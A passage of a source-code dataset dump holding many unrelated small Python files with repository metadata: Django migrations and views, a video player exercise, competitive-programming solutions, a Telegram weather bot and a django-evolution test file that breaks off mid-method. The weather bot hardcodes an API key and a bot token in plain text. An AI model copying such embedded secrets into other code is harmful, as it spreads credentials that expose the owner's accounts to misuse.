ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
ERR_OPENFILE_FAILED: 'Open of file failed',
ERR_ALLOC_FAILED: 'Memory allocation failed',
ERR_WRITE_FILE_FAILED: 'Write to file failed',
ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
} | [
"francisck@protonmail.ch"
] | francisck@protonmail.ch |
9996767e05c7ef174897a5a5d2132490b329d786 | d32d727252dbda22cd3d4b68c0e6f01abf8c7549 | /src/tweets/migrations/0001_initial.py | 51077d551987f68519e415d9d5e34a900dffb366 | [] | no_license | chintan2011/tweetme | aa6fa7666692ccb3bc7e84ceb3fd1b5227b289cb | a7e09cf1e88950bad7d50a1f137cb3762e4bab33 | refs/heads/master | 2020-03-23T06:30:44.815158 | 2018-10-11T02:00:17 | 2018-10-11T02:00:17 | 141,213,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-07-14 04:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('content2', models.TextField()),
('content3', models.TextField()),
],
),
]
| [
"chintan2011@gmail.com"
] | chintan2011@gmail.com |
d8ebc2755556bbbea6c3815331a3c6b35acf71d2 | a524f7ab59b8c9fa124c68d6e17a1b4cd0c0062b | /string/romanToInteger/Solution.py | 9a7aea77faaec56f327beb80bc8ce89e829c3abe | [] | no_license | sulenn/leetcode_python | 796b1c9cc52446717f01cda8075eb54db479d4cb | 238880a43fac9f2abdfb4202e5d03ce4f1b1e95d | refs/heads/master | 2020-08-06T22:33:06.111130 | 2019-12-15T12:52:51 | 2019-12-15T12:52:51 | 213,183,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 643 | py | class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
romanDic = {"I":1,"V":5,"X":10,"L":50,"C":100,"D":500,"M":1000}
curNum = 0
sum = 0
i = len(s) - 1
while i >= 0:
if romanDic[s[i]] < curNum:
sum -= romanDic[s[i]]
else:
sum += romanDic[s[i]]
curNum = romanDic[s[i]]
i -= 1
return sum
if __name__ == '__main__':
s = Solution()
print s.romanToInt("III")
print s.romanToInt("IV")
print s.romanToInt("IX")
print s.romanToInt("LVIII") | [
"273409891@qq.com"
] | 273409891@qq.com |
3ce562a5e5b5881b87d936099c74eb0efc486b7b | 05de912d5579e031a8ccaeb9b8ea70f1431b82ad | /mopidy/audio/mixers/__init__.py | feaccc3d077f9d2b34cbf8dfeb1dad65870713f2 | [
"Apache-2.0"
] | permissive | cave-scorpion/mopidy | bcb0939ddacb0bd295ad36c2b073b369869a15cf | 5d83e3e97a47efcfa62558ba57fd394b8c311aa6 | refs/heads/master | 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
gobject.type_register(mixer_class)
gst.element_register(
mixer_class, mixer_class.__name__.lower(), gst.RANK_MARGINAL)
def register_mixers():
register_mixer(AutoAudioMixer)
register_mixer(FakeMixer)
register_mixer(NadMixer)
| [
"stein.magnus@jodal.no"
] | stein.magnus@jodal.no |
e121faeaf0b31da6101bf336f08d7f4ccf422adb | 4dc05d1f439a8f8ddd6fb1362134a5a4fa7e83b6 | /google code/src/video_player.py | a83cac56ee4d84cbd24ed9b0a0da49063f3b00e3 | [] | no_license | Ramil112358/python-google- | 175a940028950c2ddf752c9d9c0cc50bf89518ca | 7cc6c5cc1a77141e9e08af1442ea657c8dda1ab9 | refs/heads/main | 2023-06-08T12:20:55.393339 | 2021-07-01T11:21:12 | 2021-07-01T11:21:12 | 382,007,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,271 | py | """A video player class."""
from src.video_playlist import Playlist
from src.video import Video
from .video_library import VideoLibrary
import random
import enum
class video_state(enum.Enum):
Playing = 1
Pause = 2
Stop = 3
Continue = 4
class video_under_process:
def __init__(self):
self.video = None
self.status = video_state.Stop
def set_video(self, video, state):
self.video = video
self.set_status(state)
def set_status(self, state):
self.status = state
if self.status == video_state.Playing:
print("Playing video: " + self.video._title)
elif self.status == video_state.Pause:
print("Pausing video: " + self.video._title)
elif self.status == video_state.Stop:
print("Stopping video: " + self.video._title)
self.video = None
elif self.status == video_state.Continue:
print("Continuing video: " + self.video._title)
class VideoPlayer:
"""A class used to represent a Video Player."""
def __init__(self):
self._video_library = VideoLibrary() #contain information regarding all videos
self.video_under_process = video_under_process() #currently playing video
self.playlists = dict()
self.userWrittenStylePlaylists = dict()
# ======================================= PART 1
def get_video_details(self, video):
addition_string = ""
if video.flagged != None:
addition_string = " - FLAGGED (reason: " + video.flagged + ")"
return str(video._title + " (" + video._video_id + ") [" + ' '.join(list(video._tags)) + "]" + addition_string)
def Sort_video_WRT_Titles(self, videos):
videos.sort(key = lambda x: x._title)
return videos
def number_of_videos(self):
num_videos = len(self._video_library.get_all_videos())
print(f"{num_videos} videos in the library")
def show_all_videos(self):
"""Returns all videos."""
# print("show_all_videos needs implementation")
print("Here's a list of all available videos:")
for vid in self.Sort_video_WRT_Titles( self._video_library.get_all_videos() ):
print( " ", self.get_video_details(vid) )
def play_video(self, video_id):
"""Plays the respective video.
Args:
video_id: The video_id to be played.
"""
# print("play_video needs implementation")
video = self._video_library.get_video(video_id)
if video != None:
if(video.flagged == None):
if self.video_under_process.status != video_state.Stop: #for avoiding the first time error print message from stop_video
self.stop_video() #stopping the current video if playing
self.video_under_process.set_video(video, video_state.Playing)
else:
print("Cannot play video: Video is currently flagged (reason: "+ video.flagged +")")
else:
print("Cannot play video: Video does not exist")
def stop_video(self):
"""Stops the current video."""
# print("stop_video needs implementation")
if self.video_under_process.status != video_state.Stop:
self.video_under_process.set_status(video_state.Stop)
else:
print("Cannot stop video: No video is currently playing")
def play_random_video(self):
"""Plays a random video from the video library."""
# print("play_random_video needs implementation")
videos = self._video_library.get_all_videos()
#if all videos are marked as flagged them showing no video avaiilable for random function
if len([x for x in videos if x.flagged == None]) == 0:
print("No videos available")
return
vid = videos[ random.randint(0, len(videos)-1) ]
self.play_video(vid._video_id)
def pause_video(self):
"""Pauses the current video."""
# print("pause_video needs implementation")
if self.video_under_process.video != None:
if( self.video_under_process.status != video_state.Pause ):
self.video_under_process.set_status(video_state.Pause)
else:
print("Video already paused:", self.video_under_process.video._title)
else:
print("Cannot pause video: No video is currently playing")
def continue_video(self):
"""Resumes playing the current video."""
# print("continue_video needs implementation")
if self.video_under_process.video != None:
if self.video_under_process.status == video_state.Pause:
self.video_under_process.set_status(video_state.Continue)
else:
print("Cannot continue video: Video is not paused")
else:
print("Cannot continue video: No video is currently playing")
def show_playing(self):
"""Displays video currently playing."""
# print("show_playing needs implementation")
if self.video_under_process.video != None:
if self.video_under_process.status != video_state.Pause:
print("Currently playing:", self.get_video_details(self.video_under_process.video))
else:
print("Currently playing:", self.get_video_details(self.video_under_process.video), "- PAUSED")
else:
print("No video is currently playing")
# ======================================= PART 2
def is_playlist_exist(self, name):
return name in self.playlists.keys()
def create_playlist(self, playlist_name):
"""Creates a playlist with a given name.
Args:
playlist_name: The playlist name.
"""
# print("create_playlist needs implementation")
pln = playlist_name.lower()
if pln in self.playlists.keys():
print("Cannot create playlist: A playlist with the same name already exists")
else:
self.playlists[ pln ] = []
self.userWrittenStylePlaylists[pln] = playlist_name # for later user to display the playlist
print("Successfully created new playlist:", self.userWrittenStylePlaylists[pln])
def add_to_playlist(self, playlist_name, video_id):
"""Adds a video to a playlist with a given name.
Args:
playlist_name: The playlist name.
video_id: The video_id to be added.
"""
# print("add_to_playlist needs implementation")
pln = playlist_name.lower()
video = self._video_library.get_video(video_id)
if self.is_playlist_exist(pln):
if video != None:
if(video.flagged == None):
if video in self.playlists[ pln ]:
print("Cannot add video to " + playlist_name + ": Video already added")
else:
self.playlists[ pln ].append( video )
print("Added video to " + playlist_name + ":", video._title)
else:
print("Cannot add video to " + playlist_name + ": Video is currently flagged (reason: " + \
video.flagged + ")")
else:
print("Cannot add video to " + playlist_name + ": Video does not exist")
else:
print("Cannot add video to " + playlist_name + ": Playlist does not exist")
def show_all_playlists(self):
"""Display all playlists."""
# print("show_all_playlists needs implementation")
if(len(self.playlists.keys()) == 0): #means no playlist added
print("No playlists exist yet")
else:
print("Showing all playlists: ")
for playlist in sorted(self.playlists.keys()):
print( " " + self.userWrittenStylePlaylists[playlist.lower()])
def show_playlist(self, playlist_name):
"""Display all videos in a playlist with a given name.
Args:
playlist_name: The playlist name.
"""
# print("show_playlist needs implementation")
pln = playlist_name.lower()
if self.is_playlist_exist(pln):
videos = self.playlists[pln]
print("Showing playlist:", playlist_name)
if len(videos) != 0 :
for vid in videos:
print( " ", self.get_video_details(vid))
else:
print( " ", "No videos here yet")
else:
print( "Cannot show playlist " + playlist_name + ": Playlist does not exist")
def remove_from_playlist(self, playlist_name, video_id):
"""Removes a video to a playlist with a given name.
Args:
playlist_name: The playlist name.
video_id: The video_id to be removed.
"""
# print("remove_from_playlist needs implementation")
pln = playlist_name.lower()
video = self._video_library.get_video(video_id)
if self.is_playlist_exist(pln):
if video != None:
if video in self.playlists[ pln ]:
print("Removed video from " + playlist_name + ":", video._title)
self.playlists[ pln ].remove( video )
else:
print("Cannot remove video from " + playlist_name + ": Video is not in playlist")
else:
print("Cannot remove video from " + playlist_name + ": Video does not exist")
else:
print("Cannot remove video from " + playlist_name + ": Playlist does not exist")
def clear_playlist(self, playlist_name):
"""Removes all videos from a playlist with a given name.
Args:
playlist_name: The playlist name.
"""
# print("clears_playlist needs implementation")
pln = playlist_name.lower()
if self.is_playlist_exist(pln):
self.playlists[ pln ] = []
print("Successfully removed all videos from " + playlist_name )
else:
print("Cannot clear playlist " + playlist_name + ": Playlist does not exist")
def delete_playlist(self, playlist_name):
"""Deletes a playlist with a given name.
Args:
playlist_name: The playlist name.
"""
# print("deletes_playlist needs implementation")
pln = playlist_name.lower()
if self.is_playlist_exist(pln):
self.playlists.pop( pln )
print("Deleted playlist: " + pln )
else:
print("Cannot delete playlist " + pln + ": Playlist does not exist")
# ======================================= PART 3
def search_videos(self, search_term):
"""Display all the videos whose titles contain the search_term.
Args:
search_term: The query to be used in search.
"""
# print("search_videos needs implementation")
all_videos = self._video_library.get_all_videos()
response_vid = []
for video in all_videos:
if(video.flagged == None):
if search_term.lower() in video._title.lower():
response_vid.append(video)
if(len(response_vid) != 0):
i = 1
print("Here are the results for "+ search_term + ":")
for rvid in response_vid:
print(" ", str(i) + ")", self.get_video_details(rvid))
i+=1
print( "Would you like to play any of the above? If yes, specify the number of the video.")
print( "If your answer is not a valid number, we will assume it's a no.")
val = input()
if(val.isnumeric()):
_index = int(val)
if _index > 0 and _index <= len(response_vid):
self.play_video(response_vid[_index-1]._video_id)
# else:
# print("")
else:
print("No search results for", search_term)
def search_videos_tag(self, video_tag):
"""Display all videos whose tags contains the provided tag.
Args:
video_tag: The video tag to be used in search.
"""
# print("search_videos_tag needs implementation")
all_videos = self._video_library.get_all_videos()
response_vid = []
for video in all_videos:
if(video.flagged == None):
if video_tag in video._tags:
response_vid.append(video)
if(len(response_vid) != 0):
i = 1
print("Here are the results for "+ video_tag + ":")
for rvid in response_vid:
print(" ", str(i) + ")", self.get_video_details(rvid))
i+=1
print( "Would you like to play any of the above? If yes, specify the number of the video.")
print( "If your answer is not a valid number, we will assume it's a no.")
val = input()
if(val.isnumeric()):
_index = int(val)
if _index > 0 and _index <= len(response_vid):
self.play_video(response_vid[_index-1]._video_id)
# else:
# print("")
else:
print("No search results for", video_tag)
# ======================================= PART 4
def flag_video(self, video_id, flag_reason=""):
"""Mark a video as flagged.
Args:
video_id: The video_id to be flagged.
flag_reason: Reason for flagging the video.
"""
# print("flag_video needs implementation")
video = self._video_library.get_video(video_id)
#if not reason is provided
if(flag_reason == ""):
flag_reason = "Not supplied"
if video != None:
if(video.flagged == None):
#if it is the same video that is playing then stop it only
if(self.video_under_process.video != None):
if(video_id == self.video_under_process.video._video_id):
if(self.video_under_process.status == video_state.Playing or self.video_under_process.status == video_state.Pause):
self.video_under_process.set_status(video_state.Stop)
video.flagged = flag_reason
print("Successfully flagged video:", video._title + " (reason: "+ video.flagged + ")")
else:
print("Cannot flag video: Video is already flagged")
else:
print("Cannot flag video: Video does not exist")
def allow_video(self, video_id):
"""Removes a flag from a video.
Args:
video_id: The video_id to be allowed again.
"""
# print("allow_video needs implementation")
video = self._video_library.get_video(video_id)
if video != None:
if(video.flagged != None):
video.flagged = None
print("Successfully removed flag from video:", video._title)
else:
print("Cannot remove flag from video: Video is not flagged")
else:
print("Cannot remove flag from video: Video does not exist")
| [
"noreply@github.com"
] | Ramil112358.noreply@github.com |
6312302356179221ff9856c40701a2c68915f9da | 3f3eed680fa70d8fa97f0987f0cc848c9ae9cee7 | /Practice4/task4.py | db42273f59cbf995bde9bbf321a6c303bc679290 | [] | no_license | fatawesome/StructProgramming | 8480b5a5ac8e5076221df80d940187333f04f35c | 2a4f210a5dd3c87aaf8859d60a357bd832956c26 | refs/heads/master | 2021-01-22T21:00:05.658294 | 2017-05-11T17:06:28 | 2017-05-11T17:06:28 | 85,385,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | import sys
text = input()
count = 1
max_count = -sys.maxsize - 1
for i in range(1, len(text)):
if (text[i - 1] == text[i]):
count = count + 1
if (count > max_count):
max_count = count
else:
count = 1
print(max_count)
| [
"fatawesomeee@gmail.com"
] | fatawesomeee@gmail.com |
fea3bbbd91ad589283a5dfa02ff741773378fb3f | 68111bf8bb7c02f283f71f53f279810697281f61 | /store/views/signup.py | 9b7726fc73f8bd21bc431a64cd5c55339e487fd3 | [] | no_license | gauravpandey068/eshop | 915205bbb4ec8e28d58b061dff1b960e0f1524ea | 35ff0b8fe434549013b115a17c6a64c411431cce | refs/heads/main | 2023-07-26T00:24:31.644617 | 2021-01-16T09:10:44 | 2021-01-16T09:10:44 | 330,108,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,446 | py | from django.shortcuts import render, redirect
from django.contrib.auth.hashers import make_password
from store.models.customer import Customer
from django.views import View
class Signup(View):
def get(self, request):
return render(request, 'signup.html')
def post(self, request):
postData = request.POST
first_name = postData.get('firstname')
last_name = postData.get('lastname')
phone = postData.get('phone')
email = postData.get('email')
password = postData.get('password')
# validation
value = {
'first_name': first_name,
'last_name': last_name,
'phone': phone,
'email': email
}
error_message = None
customer = Customer(first_name=first_name,
last_name=last_name,
phone=phone,
email=email,
password=password)
error_message = self.validateCustomer(customer)
if not error_message:
print(first_name, last_name, phone, email, password)
customer.password = make_password(customer.password)
customer.register()
return redirect('homepage')
else:
data = {
'error': error_message,
'values': value
}
return render(request, 'signup.html', data)
def validateCustomer(self, customer):
error_message = None;
if (not customer.first_name):
error_message = "First Name Required !!"
elif len(customer.first_name) < 3:
error_message = 'First Name must be 3 char long or more'
elif not customer.last_name:
error_message = 'Last Name Required'
elif len(customer.last_name) < 3:
error_message = 'Last Name must be 4 char long or more'
elif not customer.phone:
error_message = 'Phone Number required'
elif len(customer.phone) < 10:
error_message = 'Phone Number must be 10 char Long'
elif len(customer.password) < 6:
error_message = 'Password must be 6 char long'
elif len(customer.email) < 5:
error_message = 'Email must be 5 char long'
elif customer.isExists():
error_message = 'Email Address Already Registered..'
# saving
return error_message
| [
"pandeygaurav068@gmail.com"
] | pandeygaurav068@gmail.com |
06d216017db674320df2d21293626f0def46e3fa | d0032a8f5dc002aa8e49dde603e3aa802a719683 | /bot.py | 595670f7615587971ea7ad1d9a9329a00061b6e2 | [] | no_license | Dymos16/bot | ddcc29e790bff82fe3f83c2f0bdcb9d920c67e64 | ed881c3dafd44bdcb6126b11ca023bf00dc16d7d | refs/heads/master | 2022-09-11T19:18:08.105148 | 2020-05-24T14:08:18 | 2020-05-24T14:08:18 | 266,541,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | import pyowm
import telebot
owm = pyowm.OWM('6d00d1d4e704068d70191bad2673e0cc', language = "ru")
bot = telebot.TeleBot("1230024109:AAHoslqnQcmS1B9EuHM4k4SG7bV0KZ1B13w")
@bot.message_handler(content_types=['text'])
def send_echo(message):
observation = owm.weather_at_place(message.text)
w = observation.get_weather()
temp = w.get_temperature('celsius')["temp"]
answer = "В городе" + message.text + "сейчас" + w.get_detailed_status() + "/n"
answer += "Температура около" + str(temp) + "/n/n"
if temp < 10:
answer += "В такую погоду нужно одеться потеплее"
elif temp < 20:
answer += "В такую погоду можно не утепляться"
else: answer += "Погода отменная. Одевайся как хочешь"
bot.send_message(message.chat.id, answer)
bot.polling ( none_stop = True ) | [
"noreply@github.com"
] | Dymos16.noreply@github.com |
fb6c4681c0f1024ba2952acc051b817555e4f465 | 173227142c085b6463dff03018615dd98a1c55d2 | /Methods and Functions/Question 6.py | 136942e93220dfb948b7b3221f0e53ea6bbc64bf | [] | no_license | HBlack09/ICTPRG-Python | 095718567e8081ca8f75066241adbb707f3db717 | 53057ba10219901a0c690acb8c8cbdf911f71cc1 | refs/heads/main | 2023-05-28T01:18:49.365555 | 2021-06-23T01:56:06 | 2021-06-23T01:56:06 | 358,219,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | def SortWordsAlphabetically(s):
s = [c for c in s.lower().split('-')]
s.sort()
return '-'.join(s)
print("Test 1 Passed: " + str(SortWordsAlphabetically("Bob-does-not-like-frank") == 'bob-does-frank-like-not'))
print("Test 2 Passed: " + str(SortWordsAlphabetically("why-am-i-doing-this-this-is-terrible") == "am-doing-i-is-terrible-this-this-why"))
print("Test 3 Passed: " + str(SortWordsAlphabetically("frank-kill-zoe-did") == "did-frank-kill-zoe"))
| [
"noreply@github.com"
] | HBlack09.noreply@github.com |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderBeginnerContest/1XX/186/E_another.py | 5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5 | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,876 | py | """
以下を参考に作成
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x ≡ 0 mod n を解く(xを求める).
鳥の巣原理から x <= n のため,
x = im + j (0 <= i, j <= m = n**0.5)
と表せる.
j が 0 ~ m の時の位置(s + k * j mod n)を前計算し,mapに持っておく(jmap).
s + k * (im + j) ≡ 0 mod n
s + k * j + k * im ≡ 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 ≡ 0 mod n
と表せるため, ある i に対して
(k * im mod n) + p = n or 0
となるような p が jmap に存在していれば, その時の im + j が答えとなる.
これを i が 0 ~ m の範囲で全探索し, 存在していなければ -1 となる.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
for n, s, k in NSK:
m = int(n ** 0.5) + 1
jmap = {}
for j in range(m):
tmp = (s + k * j) % n
jmap.setdefault(tmp, j)
jmap[tmp] = min(j, jmap[tmp])
for i in range(m):
tmp = (n - (k * i * m) % n) % n
if jmap.get(tmp, - 1) >= 0:
print(i * m + jmap[tmp])
break
else:
print(-1)
if __name__ == '__main__':
T = int(input())
NSK = [[int(i) for i in input().split()] for _ in range(T)]
solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
| [
"39874652+corutopi@users.noreply.github.com"
] | 39874652+corutopi@users.noreply.github.com |
61b606c1dfe74cfc71a5244dcf12c871c3d47dee | 1fea3ad1608fbe8d7a695176ce001c32992baab4 | /web_scraping/ec2files/ec2file0.py | bdcb33fe4e712a9908fed1ce7a984655bbc9e087 | [
"MIT"
] | permissive | cmgospod/Groa | 2119714f57bb911d5c9c91597a1b6558448d5dd6 | 31b3624bfe61e772b55f8175b4e95d63c9e67966 | refs/heads/master | 2021-01-02T08:06:29.570942 | 2020-02-07T20:10:54 | 2020-02-07T20:10:54 | 239,560,447 | 1 | 0 | MIT | 2020-02-10T16:38:32 | 2020-02-10T16:38:31 | null | UTF-8 | Python | false | false | 109 | py | from scraper import *
s = Scraper(start=0, end=1781, max_iter=30, scraper_instance=0)
s.scrape_letterboxd() | [
"cmgospod@users.noreply.github.com"
] | cmgospod@users.noreply.github.com |
a3b8e7c2bd30a297c6acbb500964593d46332088 | 3d82768d4f912eb940a1238a3b6347c727e52558 | /expense/migrations/0004_auto_20201024_1825.py | 83e59278f488ec0faee9c08743a0a6ee6c64bc63 | [] | no_license | surajit003/tdd-expense-app | b4dd53c1328f4dd40b39593e09f8afe9e811ff4a | 603c6f56ce35944c1acf8deefd6d7b420576e65d | refs/heads/main | 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | # Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("expense", "0003_auto_20201024_1816")]
operations = [
migrations.AlterField(
model_name="expense",
name="expense_id",
field=models.CharField(
default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
max_length=120,
primary_key=True,
serialize=False,
),
),
migrations.AlterField(
model_name="expense",
name="total",
field=models.FloatField(blank=True, null=True, verbose_name="Total"),
),
]
| [
"surajit@poweredbypeople.io"
] | surajit@poweredbypeople.io |
7514b141abc126e5037f7efc1213d03689bc0d9c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/tests/test_evolution_graph.py | 6605ada4d37302b6934cfd1385ab441c14c50fee | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 24,833 | py | """Unit tests for django_evolution.utils.graph.EvolutionGraph."""
from __future__ import unicode_literals
from django.db import DEFAULT_DB_ALIAS, connections
from django_evolution.compat.apps import get_app
from django_evolution.models import Evolution, Version
from django_evolution.support import supports_migrations
from django_evolution.tests.base_test_case import (MigrationsTestsMixin,
TestCase)
from django_evolution.tests.decorators import requires_migrations
from django_evolution.tests.evolutions_app.models import EvolutionsAppTestModel
from django_evolution.tests.evolutions_app2.models import \
EvolutionsApp2TestModel
from django_evolution.utils.graph import EvolutionGraph
from django_evolution.utils.migrations import (MigrationExecutor,
MigrationList,
MigrationLoader,
record_applied_migrations)
try:
# Django >= 1.7
from django.db import migrations
from django.db.migrations.graph import MigrationGraph
except ImportError:
# Django < 1.7
MigrationGraph = None
migrations = None
class EvolutionGraphTests(MigrationsTestsMixin, TestCase):
"""Unit tests for django_evolution.utils.graph.EvolutionGraph."""
def test_add_evolutions(self):
"""Testing EvolutionGraph.add_evolutions"""
app = get_app('django_evolution')
evolutions = [
Evolution(app_label='django_evolution',
label='my_evolution1'),
Evolution(app_label='django_evolution',
label='my_evolution2'),
]
graph = EvolutionGraph()
graph.add_evolutions(
app=app,
evolutions=evolutions,
new_models=[
Evolution,
Version,
],
extra_state={
'foo': 'bar',
})
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 6)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:django_evolution:__first__',
required_by={
'create-model:django_evolution:evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='create-model:django_evolution:evolution',
dependencies={
'evolution:django_evolution:__first__'
},
required_by={
'create-model:django_evolution:version',
},
state={
'app': app,
'foo': 'bar',
'model': Evolution,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[2],
insert_index=2,
key='create-model:django_evolution:version',
dependencies={
'create-model:django_evolution:evolution'
},
required_by={
'evolution:django_evolution:my_evolution1',
},
state={
'app': app,
'foo': 'bar',
'model': Version,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[3],
insert_index=3,
key='evolution:django_evolution:my_evolution1',
dependencies={
'create-model:django_evolution:version'
},
required_by={
'evolution:django_evolution:my_evolution2',
},
state={
'app': app,
'evolution': evolutions[0],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[4],
insert_index=4,
key='evolution:django_evolution:my_evolution2',
dependencies={
'evolution:django_evolution:my_evolution1'
},
required_by={
'evolution:django_evolution:__last__',
},
state={
'app': app,
'evolution': evolutions[1],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[5],
insert_index=5,
key='evolution:django_evolution:__last__',
dependencies={
'evolution:django_evolution:my_evolution2'
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_add_migration_plan(self):
"""Testing EvolutionGraph.add_migration_plan"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')])
self.assertEqual(len(migration_plan), 3)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='migration:tests:0001_initial',
required_by={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('tests', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
insert_index=1,
key='migration:tests:0002_add_field',
dependencies={
'migration:tests:0001_initial',
},
required_by={
'migration:other:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('tests', '0002_add_field'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:other:0001_initial',
dependencies={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
def test_mark_evolutions_applied(self):
"""Testing EvolutionGraph.mark_evolutions_applied"""
app_label = 'app_deps_app'
app = get_app(app_label)
evolutions = [
Evolution(app_label=app_label,
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = False
graph.add_evolutions(app=app,
evolutions=evolutions)
graph.mark_evolutions_applied(app=get_app('evolutions_app'),
evolution_labels=['first_evolution'])
graph.mark_evolutions_applied(app=get_app('evolutions_app2'),
evolution_labels=['second_evolution'])
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:app_deps_app:__first__',
required_by={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='evolution:app_deps_app:test_evolution',
dependencies={
'evolution:app_deps_app:__first__',
},
required_by={
'evolution:app_deps_app:__last__',
},
state={
'app': app,
'evolution': evolutions[0],
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
insert_index=2,
key='evolution:app_deps_app:__last__',
dependencies={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_mark_migrations_applied(self):
"""Testing EvolutionGraph.mark_migrations_applied"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')],
mark_applied=[
('tests', '0001_initial'),
('tests', '0002_add_field'),
])
self.assertEqual(len(migration_plan), 1)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
insert_index=0,
key='migration:other:0001_initial',
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
def test_iter_batches(self):
"""Testing EvolutionGraph.iter_batches"""
